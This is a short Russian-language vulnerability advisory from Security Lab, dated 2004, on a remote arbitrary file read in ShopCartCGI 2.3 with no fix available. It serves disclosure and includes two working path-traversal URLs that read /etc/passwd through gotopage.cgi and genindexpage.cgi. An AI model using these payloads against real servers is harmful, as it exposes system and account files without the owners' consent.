Security Lab

Просмотр произвольных файлов в ShopCartCGI

Дата публикации:19.02.2004
Всего просмотров:913
Опасность:
Средняя
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Раскрытие важных данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: ShopCartCGI 2.x
Уязвимые версии: ShopCartCGI 2.3

Описание: Уязвимость обнаружена в ShopCartCGI. Удаленный пользователь может просматривать файлы на системе с привилегиями целевого пользователя.

 
http://[target]/directory/gotopage.cgi?13686+/../../../../../../../../../../../../../../../../etc/passwd

h ttp://[target]/directory/genindexpage.cgi?13687+Home+/../../../../../../../../../../../../../../../../etc/passwd

URL производителя: http://www.ggmate.com/ShopCartCGISoftware/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: ShopCartCGI v2.3 Remote arbitrary